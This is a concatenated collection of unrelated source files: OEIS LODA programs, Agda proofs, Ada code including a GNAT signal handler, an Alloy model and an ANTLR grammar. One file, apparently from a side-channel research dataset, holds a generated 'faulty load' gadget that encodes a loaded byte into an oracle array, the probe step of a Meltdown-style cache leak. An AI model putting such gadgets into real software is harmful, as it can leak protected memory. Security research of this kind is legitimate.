00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */

programs/oeis/086/A086483.asm

jmorken/loda

1

19113

<reponame>jmorken/loda<filename>programs/oeis/086/A086483.asm ; A086483: Bit that is two places to left of least significant bit in binary expansion of n. ; 0,0,0,0,0,1,0,1,0,0,1,0,0,1,1,1,0,0,0,0,1,1,0,1,0,0,1,0,1,1,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,1,1,1,0,0,0,0,1,1,0,1,1,0,1,0,1,1,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,1,1,1,1,0,0,0,1,1,0,1,0,0,1,0,1,1,1,1,0,0,0,0,0,1,0,1,1 sub $0,1 mul $0,2 lpb $0 mov $2,$0 sub $0,$0 add $2,1 cal $2,99549 ; Odd part of n modulo 8. add $1,$2 lpe div $1,4

agda-stdlib/src/Data/Maybe.agda

DreamLinuxer/popl21-artifact

5

6522

------------------------------------------------------------------------ -- The Agda standard library -- -- The Maybe type ------------------------------------------------------------------------ {-# OPTIONS --without-K --safe #-} module Data.Maybe where open import Data.Empty using (⊥) open import Data.Unit using (⊤) open import Data.Bool.Base using (T) open import Data.Maybe.Relation.Unary.All open import Data.Maybe.Relation.Unary.Any open import Level using (Level) private variable a : Level A : Set a ------------------------------------------------------------------------ -- The base type and some operations open import Data.Maybe.Base public ------------------------------------------------------------------------ -- Using Any and All to define Is-just and Is-nothing Is-just : Maybe A → Set _ Is-just = Any (λ _ → ⊤) Is-nothing : Maybe A → Set _ Is-nothing = All (λ _ → ⊥) to-witness : ∀ {m : Maybe A} → Is-just m → A to-witness (just {x = p} _) = p to-witness-T : ∀ (m : Maybe A) → T (is-just m) → A to-witness-T (just p) _ = p

openal-context-error.ads

io7m/coreland-openal-ada

1

30771

<gh_stars>1-10 package OpenAL.Context.Error is type Error_t is (No_Error, Invalid_Device, Invalid_Context, Invalid_Enumeration, Invalid_Value, Out_Of_Memory, Unknown_Error); -- proc_map : alcGetError function Get_Error (Device : in Device_t) return Error_t; private function Map_Constant_To_Error (Error : in Types.Enumeration_t) return Error_t; end OpenAL.Context.Error;

Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_1459.asm

ljhsiun2/medusa

9

247244

.global s_prepare_buffers s_prepare_buffers: ret .global s_faulty_load s_faulty_load: push %r10 push %r11 push %r13 push %r14 push %r9 push %rax push %rbp // Store lea addresses_WC+0x3494, %r9 nop nop nop add %r10, %r10 mov $0x5152535455565758, %rbp movq %rbp, %xmm4 vmovups %ymm4, (%r9) nop nop nop nop and %rax, %rax // Faulty Load lea addresses_UC+0x9814, %r13 nop xor $22902, %r14 movb (%r13), %r11b lea oracles, %rbp and $0xff, %r11 shlq $12, %r11 mov (%rbp,%r11,1), %r11 pop %rbp pop %rax pop %r9 pop %r14 pop %r13 pop %r11 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_UC', 'same': False, 'size': 32, 'congruent': 0, 'NT': True, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_WC', 'same': False, 'size': 32, 'congruent': 5, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} [Faulty Load] {'src': {'type': 'addresses_UC', 'same': True, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'37': 21829} 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 */

iAlloy-dataset-master/mutant_version_set/sll/v1/sll.als

jringert/alloy-diff

1

2827

<gh_stars>1-10 module SinglyLinkedList //JOR//open util/integer [] as integer sig List { header: (lone Node) } sig Node { link: (lone Node) } pred Acyclic[l: List] { ((no (l.header)) || (some n: (one ((l.header).(*link))) { (no (n.link)) })) } run Acyclic

examples/fib.asm

Benderx2/FVM

2

96

include 'a32.inc' _start: LOAD_R0 string CALLF print LOAD_R1 5 XOR R1, R1 VM_DEBUG LOAD_R0 15 LOAD_R1 25 ADDR R0, R1 VM_DEBUG LOAD_R0 R1 CMPR R0, R1 JMPF_E .equal ;; this line wont be printed LOAD_R0 not_equal_string CALLF print .equal: LOAD_R0 fib_test CALLF print CALLF do_fib_test VM_EXIT print: PUSH R0 PUSH R1 .ploop: LOAD_BYTE CMPR R1, 0 JMPF_E .done VM_CALL 0 JMPF .ploop .done: POP R1 POP R0 RETF do_fib_test: LOAD_R0 1 LOAD_R2 0 LOAD_R3 1 .ploop: ; R3 = 1 ; R0 = 1 ; R0 + R3 = R0 = 2 ; R3 = 1 ; R0 = 2 ; R3 = 1 ; R0 + R3 = R0 = 3 ; R3 = 2 ; ??? LOAD_R3 R4 LOAD_R4 R0 ADDR R0, R3 LOAD_R1 R0 VM_CALL 3 LOAD_R1 ' ' VM_CALL 0 INCR R2 CMPR R2, 12 JMPF_E .done JMPF .ploop .done: RETF _end_start: _data: string: db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 0 not_equal_string: db 'R0 and R1 aren"t equal FAIL', 0 fib_test: db 'Fibonacci Test....', 0x0A, 0 _end_data: _bss: _end_bss:

notes/FOT/FOTC/Data/Nat/Induction/AdditionalHypothesis/Instances/PropertiesATP.agda

asr/fotc

11

4256

<filename>notes/FOT/FOTC/Data/Nat/Induction/AdditionalHypothesis/Instances/PropertiesATP.agda ------------------------------------------------------------------------------ -- Arithmetic properties using instances of the induction principle ------------------------------------------------------------------------------ {-# OPTIONS --exact-split #-} {-# OPTIONS --no-sized-types #-} {-# OPTIONS --no-universe-polymorphism #-} {-# OPTIONS --without-K #-} module FOT.FOTC.Data.Nat.Induction.AdditionalHypothesis.Instances.PropertiesATP where open import FOTC.Base open import FOTC.Data.Nat hiding ( N-ind ) ------------------------------------------------------------------------------ -- Induction principle with the additional hypothesis. N-ind₁ : (A : D → Set) → A zero → (∀ {n} → N n → A n → A (succ₁ n)) → ∀ {n} → N n → A n N-ind₁ A A0 h nzero = A0 N-ind₁ A A0 h (nsucc Nn) = h Nn (N-ind₁ A A0 h Nn) -- From now on we will use the N-ind₁ induction principle. N-ind = N-ind₁ ------------------------------------------------------------------------------ -- Totality properties pred-N-ind-instance : N (pred₁ zero) → (∀ {n} → N n → N (pred₁ n) → N (pred₁ (succ₁ n))) → ∀ {n} → N n → N (pred₁ n) pred-N-ind-instance = N-ind₁ (λ i → N (pred₁ i)) postulate pred-N : ∀ {n} → N n → N (pred₁ n) {-# ATP prove pred-N pred-N-ind-instance #-} +-N-ind-instance : ∀ {n} → N (zero + n) → (∀ {m} → N m → N (m + n) → N (succ₁ m + n)) → ∀ {m} → N m → N (m + n) +-N-ind-instance {n} = N-ind (λ i → N (i + n)) postulate +-N : ∀ {m n} → N m → N n → N (m + n) {-# ATP prove +-N +-N-ind-instance #-} ∸-N-ind-instance : ∀ {m} → N (m ∸ zero) → (∀ {n} → N n → N (m ∸ n) → N (m ∸ succ₁ n)) → ∀ {n} → N n → N (m ∸ n) ∸-N-ind-instance {n} = N-ind (λ i → N (n ∸ i)) postulate ∸-N : ∀ {m n} → N m → N n → N (m ∸ n) {-# ATP prove ∸-N ∸-N-ind-instance pred-N #-} *-N-ind-instance : ∀ {n} → N (zero * n) → (∀ {m} → N m → N (m * n) → N (succ₁ m * n)) → ∀ {m} → N m → N (m * n) *-N-ind-instance {n} = N-ind (λ i → N (i * n)) postulate *-N : ∀ {m n} → N m → N n → N (m * n) {-# ATP prove *-N *-N-ind-instance +-N #-} +-rightIdentity-ind-instance : zero + zero ≡ zero → (∀ {n} → N n → n + zero ≡ n → succ₁ n + zero ≡ succ₁ n) → ∀ {n} → N n → n + zero ≡ n +-rightIdentity-ind-instance = N-ind (λ i → i + zero ≡ i) postulate +-rightIdentity : ∀ {n} → N n → n + zero ≡ n {-# ATP prove +-rightIdentity +-rightIdentity-ind-instance #-} +-assoc-ind-instance : ∀ {n} {o} → zero + n + o ≡ zero + (n + o) → (∀ {m} → N m → m + n + o ≡ m + (n + o) → succ₁ m + n + o ≡ succ₁ m + (n + o)) → ∀ {m} → N m → m + n + o ≡ m + (n + o) +-assoc-ind-instance {n} {o} = N-ind (λ i → i + n + o ≡ i + (n + o)) postulate +-assoc : ∀ {m} → N m → ∀ n o → m + n + o ≡ m + (n + o) {-# ATP prove +-assoc +-assoc-ind-instance #-} x+Sy≡S[x+y]-ind-instance : ∀ {n} → zero + succ₁ n ≡ succ₁ (zero + n) → (∀ {m} → N m → m + succ₁ n ≡ succ₁ (m + n) → succ₁ m + succ₁ n ≡ succ₁ (succ₁ m + n)) → ∀ {m} → N m → m + succ₁ n ≡ succ₁ (m + n) x+Sy≡S[x+y]-ind-instance {n} = N-ind (λ i → i + succ₁ n ≡ succ₁ (i + n)) postulate x+Sy≡S[x+y] : ∀ {m} → N m → ∀ n → m + succ₁ n ≡ succ₁ (m + n) {-# ATP prove x+Sy≡S[x+y] x+Sy≡S[x+y]-ind-instance #-} +-comm-ind-instance : ∀ {n} → zero + n ≡ n + zero → (∀ {m} → N m → m + n ≡ n + m → succ₁ m + n ≡ n + succ₁ m) → ∀ {m} → N m → m + n ≡ n + m +-comm-ind-instance {n} = N-ind (λ i → i + n ≡ n + i) postulate +-comm : ∀ {m n} → N m → N n → m + n ≡ n + m {-# ATP prove +-comm +-comm-ind-instance +-rightIdentity x+Sy≡S[x+y] #-}

other/index.agda

zamfofex/lightlib

1

16310

<reponame>zamfofex/lightlib<filename>other/index.agda {-# OPTIONS --omega-in-omega --no-termination-check --overlapping-instances #-} -- This library is licensed under 0BSD. You can read more about it at its GitHub repository: https://github.com/Zambonifofex/lightlib module index where -- The `Light.Libary` file exports modules referencing interface files and other miscellaneous files in the library. import Light.Library -- The `Light.Implementation` file exports modules referencing files that provide an implementation for the interfaces above. import Light.Implementation -- The `Light` file can be used conveniently to use the given implementation for their appropriate interfaces. import Light -- The `Light.Implementation.Standard` file provides an implementation that uses definitions from the standard library: https://github.com/agda/agda-stdlib import Light.Implementation.Standard

formalization/Data/Unsigned.agda

brunoczim/Celeste

1

6348

module Data.Unsigned where open import Data.Bit using (Bit ; b0 ; b1 ; Bits-num ; Overflowing ; _overflow:_ ; result ; carry ; WithCarry ; _with-carry:_ ; toBool ; tryToFinₙ ; !ₙ ) renaming ( _+_ to bit+ ; _-_ to bit- ; ! to bit! ; _&_ to bit& ; _~|_ to bit| ; _^_ to bit^ ; _>>_ to bit>> ; _<<_ to bit<< ) open import Data.Unit using (⊤) open import Data.Nat using (ℕ) open import Data.Vec using (Vec; head; replicate) open import Data.Nat.Literal using (Number) open import Data.Maybe using (just; nothing) infixl 8 _-_ _+_ infixl 7 _<<_ _>>_ infixl 6 _&_ infixl 5 _^_ infixl 4 _~|_ record Unsigned (n : ℕ) : Set where constructor mk-uint field bits : Vec Bit n open Unsigned public instance Unsigned-num : {m : ℕ} → Number (Unsigned m) Unsigned-num {m} .Number.Constraint = Number.Constraint (Bits-num {m}) Unsigned-num {m} .Number.fromNat n ⦃ p ⦄ = mk-uint (mk-bits p) where mk-bits : Number.Constraint (Bits-num {m}) n → Vec Bit m mk-bits p = Number.fromNat Bits-num n ⦃ p ⦄ _+_ : {n : ℕ} → Unsigned n → Unsigned n → Overflowing (Unsigned n) p + q = mk-uint (result sum) overflow: toBool (head (carry sum)) where sum = bit+ (bits p) (bits q) _-_ : {n : ℕ} → Unsigned n → Unsigned n → Overflowing (Unsigned n) p - q = mk-uint (result sub) overflow: toBool (bit! (head (carry sub))) where sub = bit- (bits p) (bits q) rotr : {n : ℕ} → Unsigned n → Unsigned n → WithCarry (Unsigned n) (Unsigned n) rotr {n} (mk-uint ps) (mk-uint qs) = new-result with-carry: new-carry where shifted : WithCarry (Vec Bit n) (Vec Bit n) shifted with tryToFinₙ qs ... | just i = bit>> ps i ... | nothing = replicate b0 with-carry: ps new-result : Unsigned n new-result = mk-uint (result shifted) new-carry : Unsigned n new-carry = mk-uint (carry shifted) rotl : {n : ℕ} → Unsigned n → Unsigned n → WithCarry (Unsigned n) (Unsigned n) rotl {n} (mk-uint ps) (mk-uint qs) = new-result with-carry: new-carry where shifted : WithCarry (Vec Bit n) (Vec Bit n) shifted with tryToFinₙ qs ... | just i = bit<< ps i ... | nothing = replicate b0 with-carry: ps new-result : Unsigned n new-result = mk-uint (result shifted) new-carry : Unsigned n new-carry = mk-uint (carry shifted) _>>_ : {n : ℕ} → Unsigned n → Unsigned n → Unsigned n ps >> qs = result (rotr ps qs) _<<_ : {n : ℕ} → Unsigned n → Unsigned n → Unsigned n ps << qs = result (rotl ps qs) ! : {n : ℕ} → Unsigned n → Unsigned n ! (mk-uint ps) = mk-uint (!ₙ ps) _&_ : {n : ℕ} → Unsigned n → Unsigned n → Unsigned n (mk-uint ps) & (mk-uint qs) = mk-uint (bit& ps qs) _~|_ : {n : ℕ} → Unsigned n → Unsigned n → Unsigned n (mk-uint ps) ~| (mk-uint qs) = mk-uint (bit| ps qs) _^_ : {n : ℕ} → Unsigned n → Unsigned n → Unsigned n (mk-uint ps) ^ (mk-uint qs) = mk-uint (bit^ ps qs)

Task/Fractal-tree/Ada/fractal-tree.ada

LaudateCorpus1/RosettaCodeData

1

28277

<filename>Task/Fractal-tree/Ada/fractal-tree.ada with Ada.Numerics.Elementary_Functions; with SDL.Video.Windows.Makers; with SDL.Video.Renderers.Makers; with SDL.Video.Rectangles; with SDL.Events.Events; procedure Fractal_Tree is Width : constant := 600; Height : constant := 600; Level : constant := 13; Length : constant := 130.0; X_Start : constant := 475.0; Y_Start : constant := 580.0; A_Start : constant := -1.54; Angle_1 : constant := 0.10; Angle_2 : constant := 0.35; C_1 : constant := 0.71; C_2 : constant := 0.87; Window : SDL.Video.Windows.Window; Renderer : SDL.Video.Renderers.Renderer; Event : SDL.Events.Events.Events; procedure Draw_Tree (Level : in Natural; Length : in Float; Angle : in Float; X, Y : in Float) is use SDL; use Ada.Numerics.Elementary_Functions; Pi : constant := Ada.Numerics.Pi; X_2 : constant Float := X + Length * Cos (Angle, 2.0 * Pi); Y_2 : constant Float := Y + Length * Sin (Angle, 2.0 * Pi); Line : constant SDL.Video.Rectangles.Line_Segment := ((C.int (X), C.int (Y)), (C.int (X_2), C.int (Y_2))); begin if Level > 0 then Renderer.Set_Draw_Colour (Colour => (0, 220, 0, 255)); Renderer.Draw (Line => Line); Draw_Tree (Level - 1, C_1 * Length, Angle + Angle_1, X_2, Y_2); Draw_Tree (Level - 1, C_2 * Length, Angle - Angle_2, X_2, Y_2); end if; end Draw_Tree; procedure Wait is use type SDL.Events.Event_Types; begin loop while SDL.Events.Events.Poll (Event) loop if Event.Common.Event_Type = SDL.Events.Quit then return; end if; end loop; delay 0.100; end loop; end Wait; begin if not SDL.Initialise (Flags => SDL.Enable_Screen) then return; end if; SDL.Video.Windows.Makers.Create (Win => Window, Title => "Fractal tree", Position => SDL.Natural_Coordinates'(X => 10, Y => 10), Size => SDL.Positive_Sizes'(Width, Height), Flags => 0); SDL.Video.Renderers.Makers.Create (Renderer, Window.Get_Surface); Renderer.Set_Draw_Colour ((0, 0, 0, 255)); Renderer.Fill (Rectangle => (0, 0, Width, Height)); Draw_Tree (Level, Length, A_Start, X_Start, Y_Start); Window.Update_Surface; Wait; Window.Finalize; SDL.Finalise; end Fractal_Tree;

Theory-and-Practice-of-Formal-Languages-Parsing/Grammars/Islands/IslandsParser.g4

KvanTTT/Samples

0

7114

parser grammar IslandsParser; options { tokenVocab = IslandsLexer; } htmlDocument : htmlElement* EOF ; htmlElement : OPEN NAME htmlAttribute* CLOSE htmlContent OPEN SLASH NAME CLOSE | OPEN NAME htmlAttribute* (SLASH_CLOSE | CLOSE) | script ; htmlContent : HTML_TEXT? (htmlElement HTML_TEXT?)* ; htmlAttribute : NAME (EQUALS ATTRIBUTE)? ; script : SCRIPT_OPEN SCRIPT_BODY+ SCRIPT_CLOSE ;

programs/oeis/134/A134467.asm

jmorken/loda

1

160091

<filename>programs/oeis/134/A134467.asm ; A134467: a(n) = n(n+1) - A000120(n), where A000120(n) = number of 1's in binary expansion of n. ; 0,1,5,10,19,28,40,53,71,88,108,129,154,179,207,236,271,304,340,377,418,459,503,548,598,647,699,752,809,866,926,987,1055,1120,1188,1257,1330,1403,1479,1556,1638,1719,1803,1888,1977,2066,2158,2251,2350,2447,2547,2648,2753,2858,2966,3075,3189,3302,3418,3535,3656,3777,3901,4026,4159,4288,4420,4553,4690,4827,4967,5108,5254,5399,5547,5696,5849,6002,6158,6315,6478,6639,6803,6968,7137,7306,7478,7651,7829,8006,8186,8367,8552,8737,8925,9114,9310,9503,9699,9896,10097,10298,10502,10707,10917,11126,11338,11551,11768,11985,12205,12426,12653,12878,13106,13335,13568,13801,14037,14274,14516,14757,15001,15246,15495,15744,15996,16249,16511,16768,17028,17289,17554,17819,18087,18356,18630,18903,19179,19456,19737,20018,20302,20587,20878,21167,21459,21752,22049,22346,22646,22947,23253,23558,23866,24175,24488,24801,25117,25434,25758,26079,26403,26728,27057,27386,27718,28051,28389,28726,29066,29407,29752,30097,30445,30794,31149,31502,31858,32215,32576,32937,33301,33666,34036,34405,34777,35150,35527,35904,36284,36665,37054,37439,37827,38216,38609,39002,39398,39795,40197,40598,41002,41407,41816,42225,42637,43050,43469,43886,44306,44727,45152,45577,46005,46434,46868,47301,47737,48174,48615,49056,49500,49945,50397,50846,51298,51751,52208,52665,53125,53586,54052,54517,54985,55454,55927,56400,56876,57353,57836,58317,58801,59286,59775,60264,60756,61249,61747,62244 mov $1,$0 mul $1,$0 lpb $0 div $0,2 add $1,$0 lpe

Validation/pyFrame3DD-master/gcc-master/gcc/ada/libgnarl/s-intman__lynxos.adb

djamal2727/Main-Bearing-Analytical-Model

0

26034

------------------------------------------------------------------------------ -- -- -- GNAT RUN-TIME LIBRARY (GNARL) COMPONENTS -- -- -- -- S Y S T E M . I N T E R R U P T _ M A N A G E M E N T -- -- -- -- B o d y -- -- -- -- Copyright (C) 1992-2020, Free Software Foundation, Inc. -- -- -- -- GNARL is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 3, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. -- -- -- -- As a special exception under Section 7 of GPL version 3, you are granted -- -- additional permissions described in the GCC Runtime Library Exception, -- -- version 3.1, as published by the Free Software Foundation. -- -- -- -- You should have received a copy of the GNU General Public License and -- -- a copy of the GCC Runtime Library Exception along with this program; -- -- see the files COPYING3 and COPYING.RUNTIME respectively. If not, see -- -- <http://www.gnu.org/licenses/>. -- -- -- -- GNARL was developed by the GNARL team at Florida State University. -- -- Extensive contributions were provided by Ada Core Technologies, Inc. -- -- -- ------------------------------------------------------------------------------ -- This is the LynxOS version of this package -- Make a careful study of all signals available under the OS, to see which -- need to be reserved, kept always unmasked, or kept always unmasked. Be on -- the lookout for special signals that may be used by the thread library. -- Since this is a multi target file, the signal <-> exception mapping -- is simple minded. If you need a more precise and target specific -- signal handling, create a new s-intman.adb that will fit your needs. -- This file assumes that: -- SIGFPE, SIGILL, SIGSEGV and SIGBUS exist. They are mapped as follows: -- SIGPFE => Constraint_Error -- SIGILL => Program_Error -- SIGSEGV => Storage_Error -- SIGBUS => Storage_Error -- SIGINT exists and will be kept unmasked unless the pragma -- Unreserve_All_Interrupts is specified anywhere in the application. -- System.OS_Interface contains the following: -- SIGADAABORT: the signal that will be used to abort tasks. -- Unmasked: the OS specific set of signals that should be unmasked in -- all the threads. SIGADAABORT is unmasked by -- default -- Reserved: the OS specific set of signals that are reserved. with System.Task_Primitives; package body System.Interrupt_Management is use Interfaces.C; use System.OS_Interface; type Interrupt_List is array (Interrupt_ID range <>) of Interrupt_ID; Exception_Interrupts : constant Interrupt_List := (SIGFPE, SIGILL, SIGSEGV, SIGBUS); Unreserve_All_Interrupts : Interfaces.C.int; pragma Import (C, Unreserve_All_Interrupts, "__gl_unreserve_all_interrupts"); ----------------------- -- Local Subprograms -- ----------------------- function State (Int : Interrupt_ID) return Character; pragma Import (C, State, "__gnat_get_interrupt_state"); -- Get interrupt state. Defined in init.c The input argument is the -- interrupt number, and the result is one of the following: User : constant Character := 'u'; Runtime : constant Character := 'r'; Default : constant Character := 's'; -- 'n' this interrupt not set by any Interrupt_State pragma -- 'u' Interrupt_State pragma set state to User -- 'r' Interrupt_State pragma set state to Runtime -- 's' Interrupt_State pragma set state to System (use "default" -- system handler) procedure Notify_Exception (signo : Signal; siginfo : System.Address; ucontext : System.Address); -- This function identifies the Ada exception to be raised using the -- information when the system received a synchronous signal. Since this -- function is machine and OS dependent, different code has to be provided -- for different target. ---------------------- -- Notify_Exception -- ---------------------- Signal_Mask : aliased sigset_t; -- The set of signals handled by Notify_Exception procedure Notify_Exception (signo : Signal; siginfo : System.Address; ucontext : System.Address) is pragma Unreferenced (siginfo); Result : Interfaces.C.int; begin -- With the __builtin_longjmp, the signal mask is not restored, so we -- need to restore it explicitly. Result := pthread_sigmask (SIG_UNBLOCK, Signal_Mask'Access, null); pragma Assert (Result = 0); -- Perform the necessary context adjustments prior to a raise -- from a signal handler. Adjust_Context_For_Raise (signo, ucontext); -- Check that treatment of exception propagation here is consistent with -- treatment of the abort signal in System.Task_Primitives.Operations. case signo is when SIGFPE => raise Constraint_Error; when SIGILL => raise Program_Error; when SIGSEGV => raise Storage_Error; when SIGBUS => raise Storage_Error; when others => null; end case; end Notify_Exception; ---------------- -- Initialize -- ---------------- Initialized : Boolean := False; procedure Initialize is act : aliased struct_sigaction; old_act : aliased struct_sigaction; Result : System.OS_Interface.int; Use_Alternate_Stack : constant Boolean := System.Task_Primitives.Alternate_Stack_Size /= 0; -- Whether to use an alternate signal stack for stack overflows begin if Initialized then return; end if; Initialized := True; -- Need to call pthread_init very early because it is doing signal -- initializations. pthread_init; Abort_Task_Interrupt := SIGADAABORT; act.sa_handler := Notify_Exception'Address; -- Setting SA_SIGINFO asks the kernel to pass more than just the signal -- number argument to the handler when it is called. The set of extra -- parameters includes a pointer to the interrupted context, which the -- ZCX propagation scheme needs. -- Most man pages for sigaction mention that sa_sigaction should be set -- instead of sa_handler when SA_SIGINFO is on. In practice, the two -- fields are actually union'ed and located at the same offset. -- On some targets, we set sa_flags to SA_NODEFER so that during the -- handler execution we do not change the Signal_Mask to be masked for -- the Signal. -- This is a temporary fix to the problem that the Signal_Mask is not -- restored after the exception (longjmp) from the handler. The right -- fix should be made in sigsetjmp so that we save the Signal_Set and -- restore it after a longjmp. -- Since SA_NODEFER is obsolete, instead we reset explicitly the mask -- in the exception handler. Result := sigemptyset (Signal_Mask'Access); pragma Assert (Result = 0); -- Add signals that map to Ada exceptions to the mask for J in Exception_Interrupts'Range loop if State (Exception_Interrupts (J)) /= Default then Result := sigaddset (Signal_Mask'Access, Signal (Exception_Interrupts (J))); pragma Assert (Result = 0); end if; end loop; act.sa_mask := Signal_Mask; pragma Assert (Keep_Unmasked = (Interrupt_ID'Range => False)); pragma Assert (Reserve = (Interrupt_ID'Range => False)); -- Process state of exception signals for J in Exception_Interrupts'Range loop if State (Exception_Interrupts (J)) /= User then Keep_Unmasked (Exception_Interrupts (J)) := True; Reserve (Exception_Interrupts (J)) := True; if State (Exception_Interrupts (J)) /= Default then -- This file is identical to s-intman-posix.adb, except that we -- don't set the SA_SIGINFO flag in act.sa_flags, because -- LynxOS does not support that. If SA_SIGINFO is set, then -- sigaction fails, returning -1. act.sa_flags := 0; if Use_Alternate_Stack and then Exception_Interrupts (J) = SIGSEGV then act.sa_flags := act.sa_flags + SA_ONSTACK; end if; Result := sigaction (Signal (Exception_Interrupts (J)), act'Unchecked_Access, old_act'Unchecked_Access); pragma Assert (Result = 0); end if; end if; end loop; if State (Abort_Task_Interrupt) /= User then Keep_Unmasked (Abort_Task_Interrupt) := True; Reserve (Abort_Task_Interrupt) := True; end if; -- Set SIGINT to unmasked state as long as it is not in "User" state. -- Check for Unreserve_All_Interrupts last. if State (SIGINT) /= User then Keep_Unmasked (SIGINT) := True; Reserve (SIGINT) := True; end if; -- Check all signals for state that requires keeping them unmasked and -- reserved. for J in Interrupt_ID'Range loop if State (J) = Default or else State (J) = Runtime then Keep_Unmasked (J) := True; Reserve (J) := True; end if; end loop; -- Add the set of signals that must always be unmasked for this target for J in Unmasked'Range loop Keep_Unmasked (Interrupt_ID (Unmasked (J))) := True; Reserve (Interrupt_ID (Unmasked (J))) := True; end loop; -- Add target-specific reserved signals for J in Reserved'Range loop Reserve (Interrupt_ID (Reserved (J))) := True; end loop; -- Process pragma Unreserve_All_Interrupts. This overrides any settings -- due to pragma Interrupt_State: if Unreserve_All_Interrupts /= 0 then Keep_Unmasked (SIGINT) := False; Reserve (SIGINT) := False; end if; -- We do not really have Signal 0. We just use this value to identify -- non-existent signals (see s-intnam.ads). Therefore, Signal should not -- be used in all signal related operations hence mark it as reserved. Reserve (0) := True; end Initialize; end System.Interrupt_Management;

oeis/273/A273790.asm

neoneye/loda-programs

11

81857

; A273790: Partial sums of the number of active (ON,black) cells in n-th stage of growth of two-dimensional cellular automaton defined by "Rule 931", based on the 5-celled von Neumann neighborhood. ; 1,6,31,80,161,282,451,676,965,1326,1767,2296,2921,3650,4491,5452,6541,7766,9135,10656,12337,14186,16211,18420,20821,23422,26231,29256,32505,35986,39707,43676,47901,52390,57151,62192,67521,73146,79075,85316,91877,98766,105991,113560,121481,129762,138411,147436,156845,166646,176847,187456,198481,209930,221811,234132,246901,260126,273815,287976,302617,317746,333371,349500,366141,383302,400991,419216,437985,457306,477187,497636,518661,540270,562471,585272,608681,632706,657355,682636,708557,735126 mov $2,$0 add $0,3 add $0,$2 bin $0,3 trn $0,5 add $0,1